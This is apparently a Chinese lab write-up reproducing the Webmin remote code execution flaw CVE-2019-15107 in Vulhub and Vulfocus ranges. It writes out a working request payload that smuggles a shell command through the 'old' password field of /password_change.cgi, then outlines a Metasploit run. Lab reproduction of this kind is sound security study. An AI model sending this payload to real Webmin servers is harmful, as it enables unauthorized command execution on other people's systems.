Webmin远程代码执行(CVE-2019-15107)

注意
本文最后更新于 2023-10-28,文中内容可能已过时。

漏洞复现(Vulhub靶场)

进入到Vulhub靶场的/vulhub/webmin/CVE-2019-15107目录下,运行docker-compose up -d命令启动靶场。

输入用户名和密码,使用burp进行抓包。

image-20231029052947218

修改数据包的请求地址为/password_change.cgi,请求体payload改为user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2id 是要执行的命令。

image-20231029053616996

发送请求,可以在响应体中找到命令执行成功的响应数据。

使用docker-compose down命令移除环境。

msf利用

使用https://vulfocus.cn/在线靶场,启动环境,访问漏洞地址:https://123.58.224.8:48832/,注意要加https进行访问

启动vps上的msf,进入命令行模式,搜索webmin相关的poc

image-20240419111506266

这里使用第十个脚本,设置脚本参数

image-20240419111948937

设置好参数后,查看一下

image-20240419112034678

没问题后,输入run,可以成功

image-20240419112204255

0%